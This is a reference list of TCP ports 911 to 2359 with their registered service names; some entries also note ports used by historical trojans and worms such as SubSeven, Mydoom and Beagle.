TCP 911 xact-backup
TCP 912 VMware Authentication Daemon
TCP 989 FTP protocol data over TLS/SSL
TCP 990 FTP protocol control over TLS/SSL
TCP 991 Netnews Administration System
TCP 992 Telnet protocol over TLS/SSL
TCP 993 IMAP4 protocol over TLS/SSL
TCP 994 IRC protocol over TLS/SSL
TCP 995 POP3 protocol over TLS/SSL
TCP 996 vsinet
TCP 997 maitrd
TCP 998 busboy
TCP 999 puprouter
TCP 1000 cadlock
TCP 1002 Microsoft Site Server Internet Locator Service (Netmeeting/ICF)
TCP 1008 UFS-aware server
TCP 1010 surf
TCP 1011 Doly (Windows Trojan)
TCP 1015 Doly (Windows Trojan)
TCP 1023 Reserved
TCP 1024 Reserved
TCP 1025 MSTASK / network blackjack
TCP 1026 MSTASK / Remote Login Network Terminal
TCP 1030 BBN IAD
TCP 1031 InetInfo / BBN IAD
TCP 1032 BBN IAD
TCP 1042 W32.Mydoom.L virus
TCP 1047 Sun's NEO Object Request Broker
TCP 1048 Sun's NEO Object Request Broker
TCP 1049 Tobit David Postman VPMN
TCP 1050 CORBA Management Agent
TCP 1051 Optima VNET
TCP 1052 Dynamic DNS Tools
TCP 1053 Remote Assistant (RA)
TCP 1054 BRVREAD
TCP 1055 ANSYS - License Manager
TCP 1056 VFO
TCP 1057 STARTRON
TCP 1058 nim
TCP 1059 nimreg
TCP 1060 POLESTAR
TCP 1061 KIOSK
TCP 1062 Veracity
TCP 1063 KyoceraNetDev
TCP 1064 JSTEL
TCP 1065 SYSCOMLAN
TCP 1066 FPO-FNS
TCP 1067 Installation Bootstrap Proto. Serv.
TCP 1068 Installation Bootstrap Proto. Cli.
TCP 1069 COGNEX-INSIGHT
TCP 1070 GMRUpdateSERV
TCP 1071 BSQUARE-VOIP
TCP 1072 CARDAX
TCP 1073 BridgeControl
TCP 1074 FASTechnologies License Manager
TCP 1075 RDRMSHC
TCP 1076 DAB STI-C
TCP 1077 IMGames
TCP 1078 eManageCstp
TCP 1079 ASPROVATalk
TCP 1080 Socks / W32.Beagle.AB trojan
TCP 1081 PVUNIWIEN
TCP 1082 AMT-ESD-PROT
TCP 1083 Anasoft License Manager
TCP 1084 Anasoft License Manager
TCP 1085 Web Objects
TCP 1086 CPL Scrambler Logging
TCP 1087 CPL Scrambler Internal
TCP 1088 CPL Scrambler Alarm Log
TCP 1089 FF Annunciation
TCP 1090 FF Fieldbus Message Specification
TCP 1091 FF System Management
TCP 1092 OBRPD
TCP 1093 PROOFD
TCP 1094 ROOTD
TCP 1095 NICELink
TCP 1096 Common Name Resolution Protocol
TCP 1097 Sun Cluster Manager
TCP 1098 RMI Activation
TCP 1099 RMI Registry
TCP 1100 MCTP
TCP 1101 PT2-DISCOVER
TCP 1102 ADOBE SERVER 1
TCP 1103 ADOBE SERVER 2
TCP 1104 XRL
TCP 1105 FTRANHC
TCP 1106 ISOIPSIGPORT-1
TCP 1107 ISOIPSIGPORT-2
TCP 1108 ratio-adp
TCP 1109 Pop with Kerberos
TCP 1110 Cluster status info
TCP 1111 LM Social Server
TCP 1112 Intelligent Communication Protocol
TCP 1114 Mini SQL
TCP 1115 ARDUS Transfer
TCP 1116 ARDUS Control
TCP 1117 ARDUS Multicast Transfer
TCP 1123 Murray
TCP 1127 SUP debugging
TCP 1155 Network File Access
TCP 1161 Health Polling
TCP 1162 Health Trap
TCP 1169 TRIPWIRE
TCP 1178 SKK (kanji input)
TCP 1180 Millicent Client Proxy
TCP 1188 HP Web Admin
TCP 1200 SCOL
TCP 1201 Nucleus Sand
TCP 1202 caiccipc
TCP 1203 License Validation
TCP 1204 Log Request Listener
TCP 1205 Accord-MGC
TCP 1206 Anthony Data
TCP 1207 MetaSage
TCP 1208 SEAGULL AIS
TCP 1209 IPCD3
TCP 1210 EOSS
TCP 1211 Groove DPP
TCP 1212 lupa
TCP 1213 MPC LIFENET
TCP 1214 KAZAA (Morpheus)
TCP 1215 scanSTAT 1.0
TCP 1216 ETEBAC 5
TCP 1217 HPSS-NDAPI
TCP 1218 AeroFlight-ADs
TCP 1219 AeroFlight-Ret
TCP 1220 QT SERVER ADMIN
TCP 1221 SweetWARE Apps
TCP 1222 SNI R&D network
TCP 1223 TGP
TCP 1224 VPNz
TCP 1225 SLINKYSEARCH
TCP 1226 STGXFWS
TCP 1227 DNS2Go
TCP 1228 FLORENCE
TCP 1229 Novell ZFS
TCP 1234 W32.Beagle.Y trojan / Infoseek Search Agent
TCP 1239 NMSD
TCP 1241 Nessus Daemon / remote message service
TCP 1243 SubSeven (Windows Trojan)
TCP 1245 Subseven backdoor remote access tool
TCP 1248 hermes
TCP 1270 Microsoft Operations Manager MOM-Encrypted
TCP 1300 H323 Host Call Secure
TCP 1310 Husky
TCP 1311 RxMon
TCP 1312 STI Envision
TCP 1313 BMC_PATROLDB
TCP 1314 Photoscript Distributed Printing System
TCP 1319 Panja-ICSP
TCP 1320 Panja-AXBNET
TCP 1321 PIP
TCP 1335 Digital Notary Protocol
TCP 1345 VPJP
TCP 1346 Alta Analytics License Manager
TCP 1347 multi media conferencing
TCP 1348 multi media conferencing
TCP 1349 Registration Network Protocol
TCP 1350 Registration Network Protocol
TCP 1351 Digital Tool Works (MIT)
TCP 1352 Lotus Notes
TCP 1353 Relief Consulting
TCP 1354 RightBrain Software
TCP 1355 Intuitive Edge
TCP 1356 CuillaMartin Company
TCP 1357 Electronic PegBoard
TCP 1358 CONNLCLI
TCP 1359 FTSRV
TCP 1360 MIMER
TCP 1361 LinX
TCP 1362 TimeFlies
TCP 1363 Network DataMover Requester
TCP 1364 Network DataMover Server
TCP 1365 Network Software Associates
TCP 1366 Novell NetWare Comm Service Platform
TCP 1367 DCS
TCP 1368 ScreenCast
TCP 1369 GlobalView to Unix Shell
TCP 1370 Unix Shell to GlobalView
TCP 1371 Fujitsu Config Protocol
TCP 1372 Fujitsu Config Protocol
TCP 1373 Chromagrafx
TCP 1374 EPI Software Systems
TCP 1375 Bytex
TCP 1376 IBM Person to Person Software
TCP 1377 Cichlid License Manager
TCP 1378 Elan License Manager
TCP 1379 Integrity Solutions
TCP 1380 Telesis Network License Manager
TCP 1381 Apple Network License Manager
TCP 1382 udt_os
TCP 1383 GW Hannaway Network License Manager
TCP 1384 Objective Solutions License Manager
TCP 1385 Atex Publishing License Manager
TCP 1386 CheckSum License Manager
TCP 1387 Computer Aided Design Software Inc LM
TCP 1388 Objective Solutions DataBase Cache
TCP 1389 Document Manager
TCP 1390 Storage Controller
TCP 1391 Storage Access Server
TCP 1392 Print Manager
TCP 1393 Network Log Server
TCP 1394 Network Log Client
TCP 1395 PC Workstation Manager software
TCP 1396 DVL Active Mail
TCP 1397 Audio Active Mail
TCP 1398 Video Active Mail
TCP 1399 Cadkey License Manager
TCP 1400 Cadkey Tablet Daemon
TCP 1401 Goldleaf License Manager
TCP 1402 Prospero Resource Manager
TCP 1403 Prospero Resource Manager
TCP 1404 Infinite Graphics License Manager
TCP 1405 IBM Remote Execution Starter
TCP 1406 NetLabs License Manager
TCP 1407 DBSA License Manager
TCP 1408 Sophia License Manager
TCP 1409 Here License Manager
TCP 1410 HiQ License Manager
TCP 1411 AudioFile
TCP 1412 InnoSys
TCP 1413 Innosys-ACL
TCP 1414 IBM MQSeries
TCP 1415 DBStar
TCP 1416 Novell LU6.2
TCP 1417 Timbuktu Service 1 Port
TCP 1418 Timbuktu Service 2 Port
TCP 1419 Timbuktu Service 3 Port
TCP 1420 Timbuktu Service 4 Port
TCP 1421 Gandalf License Manager
TCP 1422 Autodesk License Manager
TCP 1423 Essbase Arbor Software
TCP 1424 Hybrid Encryption Protocol
TCP 1425 Zion Software License Manager
TCP 1426 Satellite-data Acquisition System 1
TCP 1427 mloadd monitoring tool
TCP 1428 Informatik License Manager
TCP 1429 Hypercom NMS
TCP 1430 Hypercom TPDU
TCP 1431 Reverse Gossip Transport
TCP 1432 Blueberry Software License Manager
TCP 1433 Microsoft-SQL-Server
TCP 1434 Microsoft-SQL-Monitor
TCP 1435 IBM CICS
TCP 1436 Satellite-data Acquisition System 2
TCP 1437 Tabula
TCP 1438 Eicon Security Agent/Server
TCP 1439 Eicon X25/SNA Gateway
TCP 1440 Eicon Service Location Protocol
TCP 1441 Cadis License Management
TCP 1442 Cadis License Management
TCP 1443 Integrated Engineering Software
TCP 1444 Marcam License Management
TCP 1445 Proxima License Manager
TCP 1446 Optical Research Associates License Manager
TCP 1447 Applied Parallel Research LM
TCP 1448 OpenConnect License Manager
TCP 1449 PEport
TCP 1450 Tandem Distributed Workbench Facility
TCP 1451 IBM Information Management
TCP 1452 GTE Government Systems License Man
TCP 1453 Genie License Manager
TCP 1454 interHDL License Manager
TCP 1455 ESL License Manager
TCP 1456 DCA
TCP 1457 Valisys License Manager
TCP 1458 Nichols Research Corp.
TCP 1459 Proshare Notebook Application
TCP 1460 Proshare Notebook Application
TCP 1461 IBM Wireless LAN
TCP 1462 World License Manager
TCP 1463 Nucleus
TCP 1464 MSL License Manager
TCP 1465 Pipes Platform
TCP 1466 Ocean Software License Manager
TCP 1467 CSDMBASE
TCP 1468 CSDM
TCP 1469 Active Analysis Limited License Manager
TCP 1470 Universal Analytics
TCP 1471 csdmbase
TCP 1472 csdm
TCP 1473 OpenMath
TCP 1474 Telefinder
TCP 1475 Taligent License Manager
TCP 1476 clvm-cfg
TCP 1477 ms-sna-server
TCP 1478 ms-sna-base
TCP 1479 dberegister
TCP 1480 PacerForum
TCP 1481 AIRS
TCP 1482 Miteksys License Manager
TCP 1483 AFS License Manager
TCP 1484 Confluent License Manager
TCP 1485 LANSource
TCP 1486 nms_topo_serv
TCP 1487 LocalInfoSrvr
TCP 1488 DocStor
TCP 1489 dmdocbroker
TCP 1490 insitu-conf
TCP 1491 anynetgateway
TCP 1492 stone-design-1
TCP 1493 netmap_lm
TCP 1494 Citrix/ica
TCP 1495 cvc
TCP 1496 liberty-lm
TCP 1497 rfx-lm
TCP 1498 Sybase SQL Any
TCP 1499 Federico Heinz Consultora
TCP 1500 VLSI License Manager
TCP 1501 Satellite-data Acquisition System 3
TCP 1502 Shiva
TCP 1503 MS Netmeeting / T.120 / Databeam
TCP 1504 EVB Software Engineering License Manager
TCP 1505 Funk Software Inc.
TCP 1506 Universal Time daemon (utcd)
TCP 1507 symplex
TCP 1508 diagmond
TCP 1509 Robcad Ltd. License Manager
TCP 1510 Midland Valley Exploration Ltd. Lic. Man.
TCP 1511 3l-l1
TCP 1512 Microsoft's Windows Internet Name Service
TCP 1513 Fujitsu Systems Business of America Inc
TCP 1514 Fujitsu Systems Business of America Inc
TCP 1515 ifor-protocol
TCP 1516 Virtual Places Audio data
TCP 1517 Virtual Places Audio control
TCP 1518 Virtual Places Video data
TCP 1519 Virtual Places Video control
TCP 1520 atm zip office
TCP 1521 Oracle8i Listener / nCube License Manager
TCP 1522 Ricardo North America License Manager
TCP 1523 cichild
TCP 1524 dtspcd / ingres
TCP 1525 Oracle / Prospero Directory Service non-priv
TCP 1526 Prospero Data Access Prot non-priv
TCP 1527 oracle
TCP 1528 micautoreg
TCP 1529 oracle
TCP 1530 Oracle ExtProc (PLSExtProc) / rap-service
TCP 1531 rap-listen
TCP 1532 miroconnect
TCP 1533 Virtual Places Software
TCP 1534 micromuse-lm
TCP 1535 ampr-info
TCP 1536 ampr-inter
TCP 1537 isi-lm
TCP 1538 3ds-lm
TCP 1539 Intellistor License Manager
TCP 1540 rds
TCP 1541 rds2
TCP 1542 gridgen-elmd
TCP 1543 simba-cs
TCP 1544 aspeclmd
TCP 1545 vistium-share
TCP 1546 abbaccuray
TCP 1547 laplink
TCP 1548 Axon License Manager
TCP 1549 Shiva Hose
TCP 1550 Image Storage license manager 3M Company
TCP 1551 HECMTL-DB
TCP 1552 pciarray
TCP 1553 sna-cs
TCP 1554 CACI Products Company License Manager
TCP 1555 livelan
TCP 1556 AshWin CI Tecnologies
TCP 1557 ArborText License Manager
TCP 1558 xingmpeg
TCP 1559 web2host
TCP 1560 asci-val
TCP 1561 facilityview
TCP 1562 pconnectmgr
TCP 1563 Cadabra License Manager
TCP 1564 Pay-Per-View
TCP 1565 WinDD
TCP 1566 CORELVIDEO
TCP 1567 jlicelmd
TCP 1568 tsspmap
TCP 1569 ets
TCP 1570 orbixd
TCP 1571 Oracle Remote Data Base
TCP 1572 Chipcom License Manager
TCP 1573 itscomm-ns
TCP 1574 mvel-lm
TCP 1575 oraclenames
TCP 1576 moldflow-lm
TCP 1577 hypercube-lm
TCP 1578 Jacobus License Manager
TCP 1579 ioc-sea-lm
TCP 1580 tn-tl-r1
TCP 1581 MIL-2045-47001
TCP 1582 MSIMS
TCP 1583 simbaexpress
TCP 1584 tn-tl-fd2
TCP 1585 intv
TCP 1586 ibm-abtact
TCP 1587 pra_elmd
TCP 1588 triquest-lm
TCP 1589 VQP
TCP 1590 gemini-lm
TCP 1591 ncpm-pm
TCP 1592 commonspace
TCP 1593 mainsoft-lm
TCP 1594 sixtrak
TCP 1595 radio
TCP 1596 radio-sm
TCP 1597 orbplus-iiop
TCP 1598 picknfs
TCP 1599 simbaservices
TCP 1600 Bofra-A worm / issd
TCP 1601 aas
TCP 1602 inspect
TCP 1603 pickodbc
TCP 1604 icabrowser
TCP 1605 Salutation Manager (Salutation Protocol)
TCP 1606 Salutation Manager (SLM-API)
TCP 1607 stt
TCP 1608 Smart Corp. License Manager
TCP 1609 isysg-lm
TCP 1610 taurus-wh
TCP 1611 Inter Library Loan
TCP 1612 NetBill Transaction Server
TCP 1613 NetBill Key Repository
TCP 1614 NetBill Credential Server
TCP 1615 NetBill Authorization Server
TCP 1616 NetBill Product Server
TCP 1617 Nimrod Inter-Agent Communication
TCP 1618 skytelnet
TCP 1619 xs-openstorage
TCP 1620 faxportwinport
TCP 1621 softdataphone
TCP 1622 ontime
TCP 1623 jaleosnd
TCP 1624 udp-sr-port
TCP 1625 svs-omagent
TCP 1626 Shockwave
TCP 1627 T.128 Gateway
TCP 1628 LonTalk normal
TCP 1629 LonTalk urgent
TCP 1630 Oracle Net8 Cman
TCP 1631 Visit view
TCP 1632 PAMMRATC
TCP 1633 PAMMRPC
TCP 1634 Log On America Probe
TCP 1635 EDB Server 1
TCP 1636 CableNet Control Protocol
TCP 1637 CableNet Admin Protocol
TCP 1638 Bofra-A worm / CableNet Info Protocol
TCP 1639 cert-initiator
TCP 1640 cert-responder
TCP 1641 InVision
TCP 1642 isis-am
TCP 1643 isis-ambc
TCP 1644 Satellite-data Acquisition System 4
TCP 1645 datametrics
TCP 1646 sa-msg-port
TCP 1647 rsap
TCP 1648 concurrent-lm
TCP 1649 kermit
TCP 1650 nkd
TCP 1651 shiva_confsrvr
TCP 1652 xnmp
TCP 1653 alphatech-lm
TCP 1654 stargatealerts
TCP 1655 dec-mbadmin
TCP 1656 dec-mbadmin-h
TCP 1657 fujitsu-mmpdc
TCP 1658 sixnetudr
TCP 1659 Silicon Grail License Manager
TCP 1660 skip-mc-gikreq
TCP 1661 netview-aix-1
TCP 1662 netview-aix-2
TCP 1663 netview-aix-3
TCP 1664 netview-aix-4
TCP 1665 netview-aix-5
TCP 1666 netview-aix-6
TCP 1667 netview-aix-7
TCP 1668 netview-aix-8
TCP 1669 netview-aix-9
TCP 1670 netview-aix-10
TCP 1671 netview-aix-11
TCP 1672 netview-aix-12
TCP 1673 Intel Proshare Multicast
TCP 1674 Intel Proshare Multicast
TCP 1675 Pacific Data Products
TCP 1676 netcomm1
TCP 1677 groupwise
TCP 1678 prolink
TCP 1679 darcorp-lm
TCP 1680 microcom-sbp
TCP 1681 sd-elmd
TCP 1682 lanyon-lantern
TCP 1683 ncpm-hip
TCP 1684 SnareSecure
TCP 1685 n2nremote
TCP 1686 cvmon
TCP 1687 nsjtp-ctrl
TCP 1688 nsjtp-data
TCP 1689 firefox
TCP 1690 ng-umds
TCP 1691 empire-empuma
TCP 1692 sstsys-lm
TCP 1693 rrirtr
TCP 1694 rrimwm
TCP 1695 rrilwm
TCP 1696 rrifmm
TCP 1697 rrisat
TCP 1698 RSVP-ENCAPSULATION-1
TCP 1699 RSVP-ENCAPSULATION-2
TCP 1700 mps-raft
TCP 1701 l2tp / AOL
TCP 1702 deskshare
TCP 1703 hb-engine
TCP 1704 bcs-broker
TCP 1705 slingshot
TCP 1706 jetform
TCP 1707 vdmplay
TCP 1708 gat-lmd
TCP 1709 centra
TCP 1710 impera
TCP 1711 pptconference
TCP 1712 resource monitoring service
TCP 1713 ConferenceTalk
TCP 1714 sesi-lm
TCP 1715 houdini-lm
TCP 1716 xmsg
TCP 1717 fj-hdnet
TCP 1718 h323gatedisc
TCP 1719 h323gatestat
TCP 1720 h323hostcall
TCP 1721 caicci
TCP 1722 HKS License Manager
TCP 1723 pptp
TCP 1724 csbphonemaster
TCP 1725 iden-ralp
TCP 1726 IBERIAGAMES
TCP 1727 winddx
TCP 1728 TELINDUS
TCP 1729 CityNL License Management
TCP 1730 roketz
TCP 1731 MS Netmeeting / Audio call control / MSICCP
TCP 1732 proxim
TCP 1733 SIMS - SIIPAT Protocol for Alarm Transmission
TCP 1734 Camber Corporation License Management
TCP 1735 PrivateChat
TCP 1736 street-stream
TCP 1737 ultimad
TCP 1738 GameGen1
TCP 1739 webaccess
TCP 1740 encore
TCP 1741 cisco-net-mgmt
TCP 1742 3Com-nsd
TCP 1743 Cinema Graphics License Manager
TCP 1744 ncpm-ft
TCP 1745 ISA Server proxy autoconfig / Remote Winsock
TCP 1746 ftrapid-1
TCP 1747 ftrapid-2
TCP 1748 oracle-em1
TCP 1749 aspen-services
TCP 1750 Simple Socket Library's PortMaster
TCP 1751 SwiftNet
TCP 1752 Leap of Faith Research License Manager
TCP 1753 Translogic License Manager
TCP 1754 oracle-em2
TCP 1755 Microsoft Streaming Server
TCP 1756 capfast-lmd
TCP 1757 cnhrp
TCP 1758 tftp-mcast
TCP 1759 SPSS License Manager
TCP 1760 www-ldap-gw
TCP 1761 cft-0
TCP 1762 cft-1
TCP 1763 cft-2
TCP 1764 cft-3
TCP 1765 cft-4
TCP 1766 cft-5
TCP 1767 cft-6
TCP 1768 cft-7
TCP 1769 bmc-net-adm
TCP 1770 bmc-net-svc
TCP 1771 vaultbase
TCP 1772 EssWeb Gateway
TCP 1773 KMSControl
TCP 1774 global-dtserv
TCP 1776 Federal Emergency Management Information System
TCP 1777 powerguardian
TCP 1778 prodigy-internet
TCP 1779 pharmasoft
TCP 1780 dpkeyserv
TCP 1781 answersoft-lm
TCP 1782 HP JetSend
TCP 1783 Port 04/14/00 fujitsu.co.jp
TCP 1784 Finle License Manager
TCP 1785 Wind River Systems License Manager
TCP 1786 funk-logger
TCP 1787 funk-license
TCP 1788 psmond
TCP 1789 hello
TCP 1790 Narrative Media Streaming Protocol
TCP 1791 EA1
TCP 1792 ibm-dt-2
TCP 1793 rsc-robot
TCP 1794 cera-bcm
TCP 1795 dpi-proxy
TCP 1796 Vocaltec Server Administration
TCP 1797 UMA
TCP 1798 Event Transfer Protocol
TCP 1799 NETRISK
TCP 1800 ANSYS-License manager
TCP 1801 Microsoft Message Queuing
TCP 1802 ConComp1
TCP 1803 HP-HCIP-GWY
TCP 1804 ENL
TCP 1805 ENL-Name
TCP 1806 Musiconline
TCP 1807 Fujitsu Hot Standby Protocol
TCP 1808 Oracle-VP2
TCP 1809 Oracle-VP1
TCP 1810 Jerand License Manager
TCP 1811 Scientia-SDB
TCP 1812 RADIUS
TCP 1813 RADIUS Accounting / HackTool.SkSocket
TCP 1814 TDP Suite
TCP 1815 MMPFT
TCP 1816 HARP
TCP 1817 RKB-OSCS
TCP 1818 Enhanced Trivial File Transfer Protocol
TCP 1819 Plato License Manager
TCP 1820 mcagent
TCP 1821 donnyworld
TCP 1822 es-elmd
TCP 1823 Unisys Natural Language License Manager
TCP 1824 metrics-pas
TCP 1825 DirecPC Video
TCP 1826 ARDT
TCP 1827 ASI
TCP 1828 itm-mcell-u
TCP 1829 Optika eMedia
TCP 1830 Oracle Net8 CMan Admin
TCP 1831 Myrtle
TCP 1832 ThoughtTreasure
TCP 1833 udpradio
TCP 1834 ARDUS Unicast
TCP 1835 ARDUS Multicast
TCP 1836 ste-smsc
TCP 1837 csoft1
TCP 1838 TALNET
TCP 1839 netopia-vo1
TCP 1840 netopia-vo2
TCP 1841 netopia-vo3
TCP 1842 netopia-vo4
TCP 1843 netopia-vo5
TCP 1844 DirecPC-DLL
TCP 1850 GSI
TCP 1851 ctcd
TCP 1860 SunSCALAR Services
TCP 1861 LeCroy VICP
TCP 1862 techra-server
TCP 1863 MSN Messenger
TCP 1864 Paradym 31 Port
TCP 1865 ENTP
TCP 1870 SunSCALAR DNS Service
TCP 1871 Cano Central 0
TCP 1872 Cano Central 1
TCP 1873 Fjmpjps
TCP 1874 Fjswapsnp
TCP 1881 IBM MQSeries
TCP 1895 Vista 4GL
TCP 1899 MC2Studios
TCP 1900 SSDP
TCP 1901 Fujitsu ICL Terminal Emulator Program A
TCP 1902 Fujitsu ICL Terminal Emulator Program B
TCP 1903 Local Link Name Resolution
TCP 1904 Fujitsu ICL Terminal Emulator Program C
TCP 1905 Secure UP.Link Gateway Protocol
TCP 1906 TPortMapperReq
TCP 1907 IntraSTAR
TCP 1908 Dawn
TCP 1909 Global World Link
TCP 1910 ultrabac
TCP 1911 Starlight Networks Multimedia Transport Protocol
TCP 1912 rhp-iibp
TCP 1913 armadp
TCP 1914 Elm-Momentum
TCP 1915 FACELINK
TCP 1916 Persoft Persona
TCP 1917 nOAgent
TCP 1918 Candle Directory Service - NDS
TCP 1919 Candle Directory Service - DCH
TCP 1920 Candle Directory Service - FERRET
TCP 1921 NoAdmin
TCP 1922 Tapestry
TCP 1923 SPICE
TCP 1924 XIIP
TCP 1930 Drive AppServer
TCP 1931 AMD SCHED
TCP 1944 close-combat
TCP 1945 dialogic-elmd
TCP 1946 tekpls
TCP 1947 hlserver
TCP 1948 eye2eye
TCP 1949 ISMA Easdaq Live
TCP 1950 ISMA Easdaq Test
TCP 1951 bcs-lmserver
TCP 1952 mpnjsc
TCP 1953 Rapid Base
TCP 1961 BTS APPSERVER
TCP 1962 BIAP-MP
TCP 1963 WebMachine
TCP 1964 SOLID E ENGINE
TCP 1965 Tivoli NPM
TCP 1966 Slush
TCP 1967 SNS Quote
TCP 1972 Cache
TCP 1973 Data Link Switching Remote Access Protocol
TCP 1974 DRP
TCP 1975 TCO Flash Agent
TCP 1976 TCO Reg Agent
TCP 1977 TCO Address Book
TCP 1978 UniSQL
TCP 1979 UniSQL Java
TCP 1984 BB
TCP 1985 Hot Standby Router Protocol
TCP 1986 cisco license management
TCP 1987 cisco RSRB Priority 1 port
TCP 1988 cisco RSRB Priority 2 port
TCP 1989 MHSnet system
TCP 1990 cisco STUN Priority 1 port
TCP 1991 cisco STUN Priority 2 port
TCP 1992 IPsendmsg
TCP 1993 cisco SNMP TCP port
TCP 1994 cisco serial tunnel port
TCP 1995 cisco perf port
TCP 1996 cisco Remote SRB port
TCP 1997 cisco Gateway Discovery Protocol
TCP 1998 cisco X.25 service (XOT)
TCP 1999 cisco identification port / SubSeven (Windows Trojan) / Backdoor (Windows Trojan)
TCP 2000 Remotely Anywhere / VIA NET.WORKS PostOffice Plus
TCP 2001 Cisco mgmt / Remotely Anywhere
TCP 2002 globe
TCP 2003 GNU finger
TCP 2004 mailbox
TCP 2005 encrypted symmetric telnet/login
TCP 2006 invokator
TCP 2007 dectalk
TCP 2008 conf
TCP 2009 news
TCP 2010 search
TCP 2011 raid
TCP 2012 ttyinfo
TCP 2013 raid-am
TCP 2014 troff
TCP 2015 cypress
TCP 2016 bootserver
TCP 2017 cypress-stat
TCP 2018 terminaldb
TCP 2019 whosockami
TCP 2020 xinupageserver
TCP 2021 servexec
TCP 2022 down
TCP 2023 xinuexpansion3
TCP 2024 xinuexpansion4
TCP 2025 ellpack
TCP 2026 scrabble
TCP 2027 shadowserver
TCP 2028 submitserver
TCP 2030 device2
TCP 2032 blackboard
TCP 2033 glogger
TCP 2034 scoremgr
TCP 2035 imsldoc
TCP 2038 objectmanager
TCP 2040 lam
TCP 2041 W32.Korgo Worm / interbase
TCP 2042 isis
TCP 2043 isis-bcast
TCP 2044 rimsl
TCP 2045 cdfunc
TCP 2046 sdfunc
TCP 2047 dls
TCP 2048 dls-monitor
TCP 2049 Network File System - Sun Microsystems
TCP 2053 Kerberos de-multiplexer
TCP 2054 distrib-net
TCP 2065 Data Link Switch Read Port Number
TCP 2067 Data Link Switch Write Port Number
TCP 2080 Wingate
TCP 2090 Load Report Protocol
TCP 2091 PRP
TCP 2092 Descent 3
TCP 2093 NBX CC
TCP 2094 NBX AU
TCP 2095 NBX SER
TCP 2096 NBX DIR
TCP 2097 Jet Form Preview
TCP 2098 Dialog Port
TCP 2099 H.225.0 Annex G
TCP 2100 amiganetfs
TCP 2101 Microsoft Message Queuing / rtcm-sc104
TCP 2102 Zephyr server
TCP 2103 Microsoft Message Queuing RPC / Zephyr serv-hm connection
TCP 2104 Zephyr hostmanager
TCP 2105 Microsoft Message Queuing RPC / MiniPay
TCP 2106 MZAP
TCP 2107 Microsoft Message Queuing Management / BinTec Admin
TCP 2108 Comcam
TCP 2109 Ergolight
TCP 2110 UMSP
TCP 2111 DSATP
TCP 2112 Idonix MetaNet
TCP 2113 HSL StoRM
TCP 2114 NEWHEIGHTS
TCP 2115 KDM / Bugs (Windows Trojan)
TCP 2116 CCOWCMR
TCP 2117 MENTACLIENT
TCP 2118 MENTASERVER
TCP 2119 GSIGATEKEEPER
TCP 2120 Quick Eagle Networks CP
TCP 2121 CCProxy FTP / SCIENTIA-SSDB
TCP 2122 CauPC Remote Control
TCP 2123 GTP-Control Plane (3GPP)
TCP 2124 ELATELINK
TCP 2125 LOCKSTEP
TCP 2126 PktCable-COPS
TCP 2127 INDEX-PC-WB
TCP 2128 Net Steward Control
TCP 2129 cs-live.com
TCP 2130 SWC-XDS
TCP 2131 Avantageb2b
TCP 2132 AVAIL-EPMAP
TCP 2133 ZYMED-ZPP
TCP 2134 AVENUE
TCP 2135 Grid Resource Information Server
TCP 2136 APPWORXSRV
TCP 2137 CONNECT
TCP 2138 UNBIND-CLUSTER
TCP 2139 IAS-AUTH
TCP 2140 IAS-REG
TCP 2141 IAS-ADMIND
TCP 2142 TDM-OVER-IP
TCP 2143 Live Vault Job Control
TCP 2144 Live Vault Fast Object Transfer
TCP 2145 Live Vault Remote Diagnostic Console Support
TCP 2146 Live Vault Admin Event Notification
TCP 2147 Live Vault Authentication
TCP 2148 VERITAS UNIVERSAL COMMUNICATION LAYER
TCP 2149 ACPTSYS
TCP 2150 DYNAMIC3D
TCP 2151 DOCENT
TCP 2152 GTP-User Plane (3GPP)
TCP 2165 X-Bone API
TCP 2166 IWSERVER
TCP 2180 Millicent Vendor Gateway Server
TCP 2181 eforward
TCP 2190 TiVoConnect Beacon
TCP 2191 TvBus Messaging
TCP 2200 ICI
TCP 2201 Advanced Training System Program
TCP 2202 Int. Multimedia Teleconferencing Cosortium
TCP 2213 Kali
TCP 2220 Ganymede
TCP 2221 Rockwell CSP1
TCP 2222 Rockwell CSP2
TCP 2223 Rockwell CSP3
TCP 2232 IVS Video default
TCP 2233 INFOCRYPT
TCP 2234 DirectPlay
TCP 2235 Sercomm-WLink
TCP 2236 Nani
TCP 2237 Optech Port1 License Manager
TCP 2238 AVIVA SNA SERVER
TCP 2239 Image Query
TCP 2240 RECIPe
TCP 2241 IVS Daemon
TCP 2242 Folio Remote Server
TCP 2243 Magicom Protocol
TCP 2244 NMS Server
TCP 2245 HaO
TCP 2279 xmquery
TCP 2280 LNVPOLLER
TCP 2281 LNVCONSOLE
TCP 2282 LNVALARM
TCP 2283 Dumaru.Y (Windows trojan) / LNVSTATUS
TCP 2284 LNVMAPS
TCP 2285 LNVMAILMON
TCP 2286 NAS-Metering
TCP 2287 DNA
TCP 2288 NETML
TCP 2294 Konshus License Manager (FLEX)
TCP 2295 Advant License Manager
TCP 2296 Theta License Manager (Rainbow)
TCP 2297 D2K DataMover 1
TCP 2298 D2K DataMover 2
TCP 2299 PC Telecommute
TCP 2300 CVMMON
TCP 2301 Compaq HTTP
TCP 2302 Bindery Support
TCP 2303 Proxy Gateway
TCP 2304 Attachmate UTS
TCP 2305 MT ScaleServer
TCP 2306 TAPPI BoxNet
TCP 2307 pehelp
TCP 2308 sdhelp
TCP 2309 SD Server
TCP 2310 SD Client
TCP 2311 Message Service
TCP 2313 IAPP (Inter Access Point Protocol)
TCP 2314 CR WebSystems
TCP 2315 Precise Sft.
TCP 2316 SENT License Manager
TCP 2317 Attachmate G32
TCP 2318 Cadence Control
TCP 2319 InfoLibria
TCP 2320 Siebel NS
TCP 2321 RDLAP over UDP
TCP 2322 ofsd
TCP 2323 3d-nfsd
TCP 2324 Cosmocall
TCP 2325 Design Space License Management
TCP 2326 IDCP
TCP 2327 xingcsm
TCP 2328 Netrix SFTM
TCP 2329 NVD
TCP 2330 TSCCHAT
TCP 2331 AGENTVIEW
TCP 2332 RCC Host
TCP 2333 SNAPP
TCP 2334 ACE Client Auth
TCP 2335 ACE Proxy
TCP 2336 Apple UG Control
TCP 2337 ideesrv
TCP 2338 Norton Lambert
TCP 2339 3Com WebView
TCP 2340 WRS Registry
TCP 2341 XIO Status
TCP 2342 Seagate Manage Exec
TCP 2343 nati logos
TCP 2344 fcmsys
TCP 2345 dbm
TCP 2346 Game Connection Port
TCP 2347 Game Announcement and Location
TCP 2348 Information to query for game status
TCP 2349 Diagnostics Port
TCP 2350 psbserver
TCP 2351 psrserver
TCP 2352 pslserver
TCP 2353 pspserver
TCP 2354 psprserver
TCP 2355 psdbserver
TCP 2356 GXT License Managemant
TCP 2357 UniHub Server
TCP 2358 Futrix
TCP 2359 FlukeServer
